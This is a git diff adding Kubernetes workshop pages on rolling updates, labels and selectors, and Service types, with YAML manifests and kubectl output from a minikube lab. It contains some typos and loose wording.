Pod +➜ k8sworkshop git:(main) βœ— kubectl describe Pod nginx-deploy-66dc98fc6f-6ws8k +Name: nginx-deploy-66dc98fc6f-6ws8k +Namespace: default +Priority: 0 +Service Account: default +Node: minikube/192.168.49.2 +Start Time: Tue, 07 Mar 2023 02:12:20 +0530 +Labels: pod-template-hash=66dc98fc6f + type=dev +Annotations: +Status: Running +IP: 172.17.0.4 +IPs: + IP: 172.17.0.4 +Controlled By: ReplicaSet/nginx-deploy-66dc98fc6f +Containers: + nginx: + Container ID: docker://79a285bd1e02d96c1880958d20aa4cf64060c630ecb03dac37665994a8b4574a + Image: nginx + Image ID: docker-pullable://nginx@sha256:aa0afebbb3cfa473099a62c4b32e9b3fb73ed23f2a75a65ce1d4b4f55a5c2ef2 + Port: + Host Port: + State: Running + Started: Tue, 07 Mar 2023 02:12:25 +0530 + Ready: True + Restart Count: 0 + Environment: + Mounts: + /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-7wpgb (ro) +Conditions: + Type Status + Initialized True + Ready True + ContainersReady True + PodScheduled True +Volumes: + kube-api-access-7wpgb: + Type: Projected (a volume that contains injected data from multiple sources) + TokenExpirationSeconds: 3607 + ConfigMapName: kube-root-ca.crt + ConfigMapOptional: + DownwardAPI: true +QoS Class: BestEffort +Node-Selectors: +Tolerations: node.kubernetes.io/not-ready:NoExecute op=Exists for 300s + node.kubernetes.io/unreachable:NoExecute op=Exists for 300s +Events: + Type Reason Age From Message + ---- ------ ---- ---- ------- + Normal Scheduled 93s default-scheduler Successfully assigned default/nginx-deploy-66dc98fc6f-6ws8k to minikube + Normal Pulling 92s kubelet Pulling image "nginx" + Normal Pulled 88s kubelet Successfully pulled image "nginx" in 4.282948252s + Normal Created 88s kubelet Created container nginx + Normal Started 88s kubelet Started container nginx +➜ k8sworkshop git:(main) βœ— +``` +```sh +➜ k8sworkshop git:(main) βœ— kubectl get rs +NAME DESIRED CURRENT READY AGE +nginx-deploy-66dc98fc6f 2 2 2 3m30s +``` + +##### Using Kubernetes RollingUpdate + +You have two ways of updating all those 
pods. You can do one of the following:
+
+- Recreate: Delete all existing pods first and then start the new ones. This will lead to temporary unavailability.
+- RollingUpdate: Updates Pod one at a time to guarantee availability of the application. This is the preferred approach and you can further tune its behaviour. + +The RollingUpdate strategy options are used to guarantee a certain minimal and maximal amount of Pods to be always available: + +- maxUnavailable: The maximum number of Pods that can be unavailable during updating. The value could be a percentage (the default is 25%). +- maxSurge: The maximum number of Pods that can be created over the desired number of ReplicaSet during updating. the value of maxSurge cannot be 0 + + +```sh +vim rolling-nginx.yml +---- +# cat rolling-nginx.yml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: rolling-nginx +spec: + replicas: 4 + strategy: + type: RollingUpdate + rollingUpdate: + maxSurge: 1 + maxUnavailable: 1 + selector: + matchLabels: + app: rolling-nginx + template: + metadata: + labels: + app: rolling-nginx + spec: + containers: + - name: nginx + image: nginx:1.9 +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl create -f rolling-nginx.yml +deployment.apps/rolling-nginx created +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +nginx-deploy-66dc98fc6f-6ws8k 1/1 Running 0 15m +nginx-deploy-66dc98fc6f-btk6j 1/1 Running 0 15m +rolling-nginx-77f89bcf9c-2cgps 0/1 ContainerCreating 0 13s +rolling-nginx-77f89bcf9c-l7cvh 0/1 ContainerCreating 0 13s +rolling-nginx-77f89bcf9c-nx888 0/1 ContainerCreating 0 13s +rolling-nginx-77f89bcf9c-xn2z5 0/1 ContainerCreating 0 13s +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get deployments +NAME READY UP-TO-DATE AVAILABLE AGE +nginx-deploy 2/2 2 2 15m +rolling-nginx 1/4 4 1 50s +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get event --field-selector involvedObject.name=rolling-nginx-77f89bcf9c-xn2z5 +LAST SEEN TYPE REASON OBJECT MESSAGE +99s Normal Scheduled pod/rolling-nginx-77f89bcf9c-xn2z5 Successfully assigned default/rolling-nginx-77f89bcf9c-xn2z5 to minikube +99s Normal Pulling pod/rolling-nginx-77f89bcf9c-xn2z5 Pulling image "nginx:1.9" +43s Normal Pulled pod/rolling-nginx-77f89bcf9c-xn2z5 Successfully pulled image "nginx:1.9" in 56.078369942s +43s Normal Created pod/rolling-nginx-77f89bcf9c-xn2z5 Created container nginx +43s Normal Started pod/rolling-nginx-77f89bcf9c-xn2z5 Started container nginx +``` +#### Check rollout history + +But why CHANGE-CAUSE is showing NONE? It is because we have not used --record while creating our deployment. 
+The --record argument will add the command under CHANGE-CAUSE for each revision history +```sh + k8s101 git:(main) βœ— kubectl rollout history deployment rolling-nginx +deployment.apps/rolling-nginx +REVISION CHANGE-CAUSE +1 + +➜ k8s101 git:(main) βœ— kubectl delete deployment rolling-nginx +deployment.apps "rolling-nginx" deleted +``` + +#### this time I will use --record along with kubectl create: + +```sh +k8s101 git:(main) βœ— kubectl create -f rolling-nginx.yml --record +Flag --record has been deprecated, --record will be removed in the future +deployment.apps/rolling-nginx created +``` +```sh +➜ k8s101 git:(main) βœ— kubectl rollout history deployment rolling-nginx +deployment.apps/rolling-nginx +REVISION CHANGE-CAUSE +1 kubectl create --filename=rolling-nginx.yml --record=true +``` +```sh +➜ k8s101 git:(main) βœ— kubectl set image deployment rolling-nginx nginx=nginx:1.15 --record +Flag --record has been deprecated, --record will be removed in the future +deployment.apps/rolling-nginx image updated +``` +#### Monitor the rolling update status + +To monitor the rollout status you can use: + +```sh +➜ k8s101 git:(main) βœ— kubectl set image deployment rolling-nginx nginx=nginx:1.16 --record +Flag --record has been deprecated, --record will be removed in the future +deployment.apps/rolling-nginx image updated +``` +```sh +➜ k8s101 git:(main) βœ— kubectl rollout pause deployment rolling-nginx +deployment.apps/rolling-nginx paused +``` +```sh +➜ k8s101 git:(main) βœ— kubectl rollout status deployment rolling-nginx +deployment "rolling-nginx" successfully rolled out +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get pods -l app=rolling-nginx +NAME READY STATUS RESTARTS AGE +rolling-nginx-55fc56899f-8hlm4 1/1 Running 0 2m30s +rolling-nginx-55fc56899f-g4b6p 1/1 Running 0 2m30s +rolling-nginx-55fc56899f-hnbs8 1/1 Running 0 2m22s +rolling-nginx-55fc56899f-jngcd 1/1 Running 0 2m21s +``` +```sh +➜ k8s101 git:(main) βœ— kubectl rollout resume deployment rolling-nginx +deployment.apps/rolling-nginx resumed +``` + +#### Rolling back (undo) an update +To monitor the rollout status you can use: + +```sh +➜ k8s101 git:(main) βœ— kubectl rollout history deployment rolling-nginx +deployment.apps/rolling-nginx +REVISION CHANGE-CAUSE +1 kubectl create --filename=rolling-nginx.yml --record=true +2 kubectl set image deployment rolling-nginx nginx=nginx:1.15 --record=true +3 kubectl set image deployment rolling-nginx nginx=nginx:1.16 --record=true +``` +```sh +➜ k8s101 git:(main) βœ— kubectl rollout undo deployment rolling-nginx --to-revision=2 +deployment.apps/rolling-nginx rolled back +``` +```sh +➜ k8s101 git:(main) βœ— kubectl rollout status deployment rolling-nginx +deployment "rolling-nginx" successfully rolled out + +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl delete pod --all +pod "nginx-deploy-66dc98fc6f-6ws8k" deleted +pod "nginx-deploy-66dc98fc6f-btk6j" deleted +pod "rolling-nginx-b746d459b-874mv" deleted +pod "rolling-nginx-b746d459b-gtgpk" deleted +pod "rolling-nginx-b746d459b-txc5j" deleted +pod "rolling-nginx-b746d459b-vw4rf" deleted +➜ k8s101 git:(main) βœ— kubectl delete deployment --all +deployment.apps "nginx-deploy" deleted +deployment.apps "rolling-nginx" deleted +``` diff --git a/content/en/k8s/c6.labels-selectors 2.md b/content/en/k8s/c6.labels-selectors 2.md new file mode 100644 index 0000000..328cf23 --- /dev/null +++ b/content/en/k8s/c6.labels-selectors 2.md @@ -0,0 +1,257 @@ +--- +title: "Labels and Selectors " +description: " Selectors Labels " +slug: "Labels-and-Selectors" +--- 
+ +#### Labels - Maps (aka Dictionaries) + +```sh +➜ k8s101 git:(main) βœ— kubectl explain deployment.metadata.labels +KIND: Deployment +VERSION: apps/v1 + +FIELD: labels + +DESCRIPTION: + Map of string keys and values that can be used to organize and categorize + (scope and select) objects. May match selectors of replication controllers + and services. More info: http://kubernetes.io/docs/user-guide/labels +``` + +- Labels are attached to Kubernetes objects and are simple key: value pairs or maps(dictionary).
+- Labels are used to store identifying information about a thing that you might need to query against.
+- Labels are used for organization and selection of subsets of objects, and can be added to objects at creation time and/or modified at any time during cluster operations.
+- You will see them on pods, replication controllers, replica sets, services, and so on.
+
+```sh
+"labels": {
+  "tier": "frontend",
+  "env": "prod"
+}
+```
+
+#### Selectors - Maps (aka Dictionaries)
+
+- Labels are queryable, which makes them especially useful for organizing and selecting objects
+- A label selector is a string that identifies which labels you are trying to match
+- You will see them on pods, replication controllers, replica sets, services, and so on.
+ +``````sh +tier = frontend +tier != frontend +environment in (production, qa) +`````` + +#### Annotations +- Annotations are bits of useful information you might want to store about a pod (or cluster, node, etc.) that you will not have to query against. +- They are also key/value pairs and have the same rules as labels. +- Examples of things you might put there are the pager contact, the build date, or a pointer to more information someplace elseβ€”like a URL. + +#### Method-1: Assign labels while creating a new object + +```sh +kubectl create deployment label-nginx-example --image=nginx --dry-run=client -oyaml > label-nginx-example.yml +# clean up the template and add a label app: prod +``` + +```sh +➜ k8s101 git:(main) βœ— cat label-nginx-example.yml +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: prod + name: label-nginx-example +spec: + replicas: 2 + selector: + matchLabels: + app: prod + template: + metadata: + labels: + app: prod + spec: + containers: + - image: nginx + name: nginx +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl create -f label-nginx-example.yml +deployment.apps/label-nginx-example created +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get deployments --show-labels + +NAME READY UP-TO-DATE AVAILABLE AGE LABELS +label-nginx-example 1/1 1 1 23s app=label-nginx-example +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods --show-labels +NAME READY STATUS RESTARTS AGE LABELS +label-nginx-example-848d6df75-x8bb6 1/1 Running 0 45s app=label-nginx-example,pod-template-hash=848d6df75 +➜ k8s101 git:(main) βœ— + +``` + + +#### Assign a new label to existing pod runtime as a patch + +will assign new label "tier: frontend" to our existing Pods from the deployment label-nginx-example + +```sh +[root@controller ~]# cat update-label.yml +spec: + template: + metadata: + labels: + tier: frontend +``` + +### Next patch the deployment with this YAML file + +```sh +➜ k8s101 git:(main) βœ— kubectl patch deployment label-nginx-example --patch "$(cat update-label.yml)" +deployment.apps/label-nginx-example patched +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl describe deployment label-nginx-example +Name: label-nginx-example +Namespace: default +CreationTimestamp: Tue, 07 Mar 2023 05:40:07 +0530 +Labels: app=label-nginx-example +Annotations: deployment.kubernetes.io/revision: 2 +Selector: app=label-nginx-example +Replicas: 1 desired | 1 updated | 1 total | 1 available | 0 unavailable +StrategyType: RollingUpdate +MinReadySeconds: 0 +RollingUpdateStrategy: 25% max unavailable, 25% max surge +Pod Template: + Labels: app=label-nginx-example + tier=frontend + Containers: + nginx: + Image: nginx + Port: + Host Port: + Environment: + Mounts: + Volumes: +Conditions: + Type Status Reason + ---- ------ ------ + Available True MinimumReplicasAvailable + Progressing True NewReplicaSetAvailable +OldReplicaSets: +NewReplicaSet: label-nginx-example-5f8bc677b9 (1/1 replicas created) +Events: + Type Reason Age From Message + ---- ------ ---- ---- ------- + Normal ScalingReplicaSet 4m35s deployment-controller Scaled up replica set label-nginx-example-848d6df75 to 1 + Normal ScalingReplicaSet 74s deployment-controller Scaled up replica set label-nginx-example-5f8bc677b9 to 1 + Normal ScalingReplicaSet 70s deployment-controller Scaled down replica set label-nginx-example-848d6df75 to 0 from 1 +➜ k8s101 git:(main) βœ— +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get pods --show-labels +NAME READY STATUS RESTARTS AGE LABELS +label-nginx-example-5f8bc677b9-92lp9 1/1 Running 0 7m31s 
app=label-nginx-example,pod-template-hash=5f8bc677b9,tier=frontend +``` + + +#### Method-3: Assign a new label to existing deployments runtime using kubectl + +I have another deployment nginx-deploy on my cluster, so I will assign label tier: backend to this deployment: + +```sh +kubectl label deployment nginx-deploy tier=backend + +kubectl get deployments --show-labels + +``` +#### Using labels to list resource objects + +```sh +kubectl get pods --show-labels + +kubectl get deployments --show-labels + +kubectl get all --show-labels + +--- #To list all the deployments using type: dev label: +kubectl get deployments -l type=dev + +kubectl get pods -l app=prod +``` + +#### Using Selector to list resource objects + +I will create another deployment here with two labels and use one of the label as selector: + +```sh +# cat lab-nginx.yml +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: dev + tier: backend + name: lab-nginx +spec: + replicas: 2 + selector: + matchLabels: + app: dev + template: + metadata: + labels: + app: dev + spec: + containers: + - image: nginx + name: nginx +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl create -f lab-nginx.yml +deployment.apps/lab-nginx created +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods --show-labels +NAME READY STATUS RESTARTS AGE LABELS +lab-nginx-84756b7fc4-8h2jr 1/1 Running 0 31s app=dev,pod-template-hash=84756b7fc4 +lab-nginx-84756b7fc4-pgxbr 1/1 Running 0 31s app=dev,pod-template-hash=84756b7fc4 +label-nginx-example-5f8bc677b9-92lp9 1/1 Running 0 14m app=label-nginx-example,pod-template-hash=5f8bc677b9,tier=frontend +``` + +```sh +➜ k8s101 git:(main) βœ— +kubectl get pods --selector "app=dev" +NAME READY STATUS RESTARTS AGE +lab-nginx-84756b7fc4-8h2jr 1/1 Running 0 5m44s +lab-nginx-84756b7fc4-pgxbr 1/1 Running 0 5m44s +➜ k8s101 git:(main) βœ— +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods -l app=dev +NAME READY STATUS RESTARTS AGE +lab-nginx-84756b7fc4-8h2jr 1/1 Running 0 6m47s +lab-nginx-84756b7fc4-pgxbr 1/1 Running 0 6m47s +``` + +##### Removing labels + +``` +kubectl get pods --show-labels + +kubectl get deployments --show-labels + +``` diff --git a/content/en/k8s/c7.Services 2.md b/content/en/k8s/c7.Services 2.md new file mode 100644 index 0000000..273927a --- /dev/null +++ b/content/en/k8s/c7.Services 2.md @@ -0,0 +1,287 @@ +--- +title: "Kubernetes Service " +description: " Use Cases for Multi-Container Pods " +slug: "Kubernetes-Service" +--- + +#### kubectl explain svc + +```sh +➜ k8s101 git:(main) βœ— kubectl explain svc +KIND: Service +VERSION: v1 + +DESCRIPTION: + Service is a named abstraction of software service (for example, mysql) + consisting of local port (for example 3306) that the proxy listens on, and + the selector that determines which pods will answer requests sent through + the proxy. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an + object. Servers should convert recognized schemas to the latest internal + value, and may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. 
More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata + + spec + Spec defines the behavior of a service. + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + + status + Most recently observed status of the service. Populated by the system. + Read-only. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + + +``` + +#### Create Kubernetes Service + +A Kubernetes Service is an object you create to provide a single, stable access point to a set of pods that provide the same service.
+ +A service can be backed by more than one pod. When you connect to a service, the connection is passed to one of the backing pods.
+
+Add labels to the Pod objects and specify a matching label selector in the Service object. The pods whose labels match the selector become the Service's registered endpoints (see the sketch below).
+
+- The shorthand for Services is `svc` (for example, `kubectl get svc`).
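+
+As a minimal sketch of how that label/selector wiring looks in practice (the name `nginx-lab-svc` is hypothetical; the `app: dev` label simply mirrors the deployments used later in this chapter):
+
+```yaml
+apiVersion: v1
+kind: Service
+metadata:
+  name: nginx-lab-svc          # hypothetical name, for illustration only
+spec:
+  type: ClusterIP              # default type: internal access only
+  selector:
+    app: dev                   # every ready Pod carrying this label becomes an endpoint
+  ports:
+    - name: http
+      port: 80                 # port the Service listens on
+      targetPort: 80           # port the Pods listen on
+```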
+
+#### Understanding different Kubernetes Service Types
+
+- ClusterIP: the default type. It exposes the Service on an internal cluster IP, so it is reachable only from inside the cluster.
+
+- NodePort: allocates a static port on every node, which needs to be opened on the firewall. Any external client that can reach a node's IP address can reach the Service through that node port.
+
+- LoadBalancer: provisions an external load balancer from the underlying infrastructure, typically a public cloud such as Azure, AWS or GCP. On bare metal or minikube an add-on such as MetalLB can fill this role, as shown later in this chapter.
+
+- ExternalName: maps the Service to an external DNS name, so redirection happens at the DNS level rather than through proxying (see the sketch after this list).
+- Service without selector: used for direct connections to an IP and port combination whose endpoints you manage yourself. This is useful for reaching a database outside the cluster or a service in another namespace.
+
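+
+For the two less common types above, a minimal sketch could look like this (the host `db.example.com`, the IP `10.0.0.50` and the service names are hypothetical placeholders, not values from this lab):
+
+```yaml
+# ExternalName: in-cluster lookups of "external-db" return a DNS CNAME
+# pointing at db.example.com - no proxying or cluster IP involved.
+apiVersion: v1
+kind: Service
+metadata:
+  name: external-db
+spec:
+  type: ExternalName
+  externalName: db.example.com
+---
+# Service without a selector: Kubernetes creates no endpoints automatically,
+# so you pair it with a manually managed Endpoints object of the same name.
+apiVersion: v1
+kind: Service
+metadata:
+  name: legacy-db
+spec:
+  ports:
+    - port: 5432
+---
+apiVersion: v1
+kind: Endpoints
+metadata:
+  name: legacy-db              # must match the Service name
+subsets:
+  - addresses:
+      - ip: 10.0.0.50
+    ports:
+      - port: 5432
+```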
+ +#### Using kubectl expose + +The easiest way to create a service is through kubectl expose + +```sh +kubectl create deployment nginx-lab-1 --image=nginx --replicas=3 --dry-run=client -o yaml > nginx-lab-1.yml + +---- # modify few sections and following is my final template file to create a new deployment nginx-lab-1 with a label app=dev and 3 replicas. +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: dev + name: nginx-lab-1 +spec: + replicas: 3 + selector: + matchLabels: + app: dev + template: + metadata: + labels: + app: dev + spec: + containers: + - image: nginx + name: nginx + +--- +# cat quote for pod +apiVersion: v1 +kind: Service +metadata: + name: quote +spec: + type: ClusterIP + selector: + app: quote + ports: + - name: http + port: 80 + targetPort: 80 + protocol: TCP + +``` + +``` +➜ k8s101 git:(main) βœ— kubectl create -f nginx-lab-1.yml +deployment.apps/nginx-lab-1 created +service/quote created + +``` + +#### To create the service, you’ll tell Kubernetes to expose the Deployment you created earlier, here port 80 is the default port on which our nginx application would be listening on. + +```sh +➜ k8s101 git:(main) βœ— kubectl expose deployment nginx-lab-1 --type=NodePort --port=80 +service/nginx-lab-1 exposed +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl describe svc nginx-lab-1 +Name: nginx-lab-1 +Namespace: default +Labels: app=dev +Annotations: +Selector: app=dev +Type: NodePort +IP Family Policy: SingleStack +IP Families: IPv4 +IP: 10.98.242.63 +IPs: 10.98.242.63 +Port: 80/TCP +TargetPort: 80/TCP +NodePort: 31613/TCP +Endpoints: 172.17.0.13:80,172.17.0.14:80,172.17.0.15:80 + 2 more... +Session Affinity: None +External Traffic Policy: Cluster +Events: + +``` + +##### Accessing cluster-internal services + +- The ClusterIP services you created in the previous section are accessible only within the cluster, from other pods and from the cluster nodes.
+- Use the kubectl exec command to run a command such as curl in an existing pod and have it connect to the service, or start a throwaway pod for the test, as in the sketch below.
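+
+A minimal sketch of that in-cluster check, mirroring the throwaway-pod pattern used later in this chapter (10.98.242.63 is the quote service cluster IP quoted just below; substitute any IP or service name from `kubectl get svc`):
+
+```sh
+# Run a short-lived pod and fetch the service through its cluster IP
+kubectl run -i --tty --rm debug --image=alpine --restart=Never -- \
+  wget -qO- http://10.98.242.63
+
+# The same works with the service's in-cluster DNS name:
+# <service>.<namespace>.svc.cluster.local
+kubectl run -i --tty --rm debug --image=alpine --restart=Never -- \
+  wget -qO- http://quote.default.svc.cluster.local
+```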
+ +To use the service from a pod, run a shell in the quote-001 + In my case, the quiz service uses cluster IP 10.99.118.40, whereas the quote service uses IP 10.98.242.63 + + +#### Access container outsusteride the clluster + +Now to access the container externally from the outside network we can use the public IP of individual worker node along with the NodePort + +curl https://: + +```sh +kubectl get pods -o wide + +``` +#### Creating a service through a YAML descriptor + +```sh +[root@controller ~]# cat 2048.yml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: "2048-deployment" +spec: + selector: + matchLabels: + app: "2048" + replicas: 5 + template: + metadata: + labels: + app: "2048" + spec: + containers: + - image: alexwhen/docker-2048 + imagePullPolicy: Always + name: "2048" + ports: + - containerPort: 80 + protocol: TCP +-- ##### Creating a NodePort service +apiVersion: v1 +kind: Service +metadata: + name: myservice + labels: + app: servicelabel +spec: + type: NodePort + ports: + - port: 80 + selector: + app: "2048" +``` + +```sh +kubectl create -f 2048.yml +``` + + +```sh +➜ k8s101 git:(main) βœ— kubectl get pods -o wide +NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES +2048-deployment-9ccbf58bd-57tng 1/1 Running 0 50s 172.17.0.12 minikube +2048-deployment-9ccbf58bd-78pnr 1/1 Running 0 50s 172.17.0.14 minikube +2048-deployment-9ccbf58bd-mbfrt 1/1 Running 0 50s 172.17.0.13 minikube +2048-deployment-9ccbf58bd-tfcnd 1/1 Running 0 50s 172.17.0.9 minikube +2048-deployment-9ccbf58bd-trxqw 1/1 Running 0 50s 172.17.0.11 minikube +kube-ops-view-5b596b7c7d-z2p2v 1/1 Running 0 7h37m 172.17.0.17 minikube +kube-ops-view-redis-6dc75f67cd-klhpf 1/1 Running 0 7h37m 172.17.0.16 minikube +lab-nginx-84756b7fc4-4qctt 1/1 Running 0 7h37m 172.17.0.19 minikube +lab-nginx-84756b7fc4-rhg4m 1/1 Running 0 7h37m 172.17.0.18 minikube +label-nginx-example-5f8bc677b9-6trt6 1/1 Running 0 7h37m 172.17.0.20 minikube +my-release-kubeview-f7447cf6c-2w85w 1/1 Running 0 7h37m 172.17.0.21 minikube +nginx-1-ff5997cdf-kpff9 1/1 Running 0 7h37m 172.17.0.7 minikube +nginx-lab-1-84756b7fc4-77kvz 1/1 Running 0 7h37m 172.17.0.8 minikube +nginx-lab-1-84756b7fc4-r9cmt 1/1 Running 0 7h37m 172.17.0.4 minikube +nginx-lab-1-84756b7fc4-sqbf4 1/1 Running 0 7h37m 172.17.0.10 minikube + +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get svc +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +kubernetes ClusterIP 10.96.0.1 443/TCP 31m +myservice NodePort 10.111.94.141 80:31487/TCP 2m55s +``` +```sh +➜ k8s101 git:(main) βœ— kubectl describe service myservice +Name: myservice +Namespace: default +Labels: app=servicelabel +Annotations: +Selector: app=2048 +Type: NodePort +IP Family Policy: SingleStack +IP Families: IPv4 +IP: 10.111.94.141 +IPs: 10.111.94.141 +Port: 80/TCP +TargetPort: 80/TCP +NodePort: 31487/TCP +Endpoints: 172.17.0.11:80,172.17.0.12:80,172.17.0.13:80 + 2 more... +Session Affinity: None +External Traffic Policy: Cluster +Events: +➜ k8s101 git:(main) βœ— + +``` + +##### Accessing a NodePort service + +``` +➜ k8s101 git:(main) βœ— minikube service myservice +|-----------|-----------|-------------|---------------------------| +| NAMESPACE | NAME | TARGET PORT | URL | +|-----------|-----------|-------------|---------------------------| +| default | myservice | 80 | http://192.168.49.2:31487 | +|-----------|-----------|-------------|---------------------------| +πŸƒ Starting tunnel for service myservice. 
+|-----------|-----------|-------------|------------------------| +| NAMESPACE | NAME | TARGET PORT | URL | +|-----------|-----------|-------------|------------------------| +| default | myservice | | http://127.0.0.1:60323 | +|-----------|-----------|-------------|------------------------| +πŸŽ‰ Opening service default/myservice in default browser... +❗ Because you are using a Docker driver on darwin, the terminal needs to be open to run it. +``` + + + + diff --git a/content/en/k8s/c8.Service-Type 2.md b/content/en/k8s/c8.Service-Type 2.md new file mode 100644 index 0000000..dc6281b --- /dev/null +++ b/content/en/k8s/c8.Service-Type 2.md @@ -0,0 +1,395 @@ +--- +title: "Service Type - NodePort,ClusterIP,LoadBalancer " +description: " kubernetes Service " +slug: "Service-Type-NodePort,ClusterIP,LoadBalancer" +--- + +#### Service Type1: NodePort + +NodePort service helps expose the Service on each Node’s IP at a static port (the NodePort). NodePort The port is available to all the workers in the cluster. A ClusterIP Service, to which the NodePort Service routes are automatically created. One would be able to contact the NodePort Service, from outside the cluster, by requesting :. +The port on the POD is called the targetPort and the one connecting the NodePort service to the POD is called port. +All this means if any request coming into port 30080 to the cluster on any worker node will be forwarded to the β€œNode Port Service,” which in turn will forward the request to the underlying Pod at port 80. + + +Let’s start with creating a deployment using the YAML file below. Some key things to note, each container is using the port 80 and has a label called app:nginx + + +```yaml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: my-nginx-deploy + labels: + app: nginx +spec: + replicas: 2 + selector: + matchLabels: + app: nginx + template: + metadata: + labels: + app: nginx + spec: + containers: + - name: test-nginx + image: nginx:alpine + ports: + - containerPort: 80 + +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f my-nginx-deploy.yml +deployment.apps/my-nginx-deploy created +➜ k8s101 git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +my-nginx-deploy-5c9989fcf4-pqpgj 1/1 Running 0 17s +my-nginx-deploy-5c9989fcf4-zkq8p 1/1 Running 0 17s +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl describe pod my-nginx-deploy-5c9989fcf4-pqpgj | grep -i IP: | head -1 +IP: 172.17.0.22 + +➜ k8s101 git:(main) βœ— kubectl describe pod my-nginx-deploy-5c9989fcf4-zkq8p | grep -i IP: | head -1 +IP: 172.17.0.15 +``` + +```sh +kubectl get pods +NAME READY STATUS RESTARTS AGE +my-nginx-deploy-6b5d6b54bc-7pbmk 1/1 Running 0 7m47s +my-nginx-deploy-6b5d6b54bc-glhnt 1/1 Running 0 7m47s +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl describe pod my-nginx-deploy-5c9989fcf4-pqpgj | grep -i IP: | head -1 +IP: 172.17.0.22 +➜ k8s101 git:(main) βœ— kubectl describe pod my-nginx-deploy-5c9989fcf4-zkq8p | grep -i IP: | head -1 +IP: 172.17.0.15 +➜ k8s101 git:(main) βœ— kubectl exec my-nginx-deploy-5c9989fcf4-pqpgj -it sh +kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead. +/ # apk add curl +fetch https://dl-cdn.alpinelinux.org/alpine/v3.17/main/aarch64/APKINDEX.tar.gz +fetch https://dl-cdn.alpinelinux.org/alpine/v3.17/community/aarch64/APKINDEX.tar.gz +OK: 43 MiB in 62 packages +/ # curl http://172.17.0.22:80 + + + +Welcome to nginx! + + + +

+Welcome to nginx!
+If you see this page, the nginx web server is successfully installed and working. Further configuration is required.
+
+For online documentation and support please refer to nginx.org.
+Commercial support is available at nginx.com.
+
+Thank you for using nginx.
+ + +/ # exit +``` + +So how do we reach the PODs externally? +To reach the pods from outside the cluster, one needs to expose the port on the host machine to redirect the traffic to a port of the container. NodePort Service provides that capability. + +```yaml +apiVersion: v1 +kind: Service +metadata: + name: my-service +spec: + type: NodePort + selector: + app: nginx + ports: + # By default the `targetPort` is set to the same value as the `port` field. + - port: 80 + targetPort: 80 + # Optional field + # By default and for convenience, the Kubernetes control plane will allocate a port from a range (default: 30000-32767) + nodePort: 30007 +``` + +``` +kubectl apply -f nodeport.yml +service/my-service created +kubectl get svc +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +my-service NodePort 10.110.8.243 80:30007/TCP 12m +``` + + +NodePort service created has a virtual IP (10.110.8.243) assigned to it called ClusterIp, using which it can be accessed internally. To access the service, since we are using minikube, let’s see where the service is hosted for external usage. + +```sh + k8s101 git:(main) βœ— minikube service my-service +|-----------|------------|-------------|---------------------------| +| NAMESPACE | NAME | TARGET PORT | URL | +|-----------|------------|-------------|---------------------------| +| default | my-service | 80 | http://192.168.49.2:30007 | +|-----------|------------|-------------|---------------------------| +πŸƒ Starting tunnel for service my-service. +|-----------|------------|-------------|------------------------| +| NAMESPACE | NAME | TARGET PORT | URL | +|-----------|------------|-------------|------------------------| +| default | my-service | | http://127.0.0.1:61723 | +|-----------|------------|-------------|------------------------| +πŸŽ‰ Opening service default/my-service in default browser... + +``` + + +|`Feature`| `ClusterIP` | `NodePort` | `LoadBalancer`| +|:----|:---- |:------:| -----:| +|**Exposition**|Exposes the Service on an internal IP in the cluster.|Exposing services to external clients|Exposing services to external clients| +|**Cluster** |This type makes the Service only reachable from within the cluster|A NodePort service, each cluster node opens a port on the node itself (hence the name) and redirects traffic received on that port to the underlying service.|A LoadBalancer service accessible through a dedicated load balancer, provisioned from the cloud infrastructure Kubernetes is running on| +|**Accessibility**|It is **default** service and Internal clients send requests to a stable internal IP address.|The service is accessible at the internal cluster IP-port, and also through a dedicated port on all nodes.|Clients connect to the service through the load balancer’s IP.| +|**Yaml Config**|`type: ClusterIP `|`type: NodePort`|`type: LoadBalancer`| +|**Port Range**|Any public ip form Cluster|30000 - 32767|Any public ip form Cluster| +|**User Cases**| For internal communication |Best for testing public or private access or providing access for a small amount of time.| widely used For External communication| + + + +### ClusterIP + +ClusterIP is the default ServiceType and it creates a single IP address that can be used to access its Pods which can only be accessed from inside the cluster. If KubeDNS is enabled it will also get a series 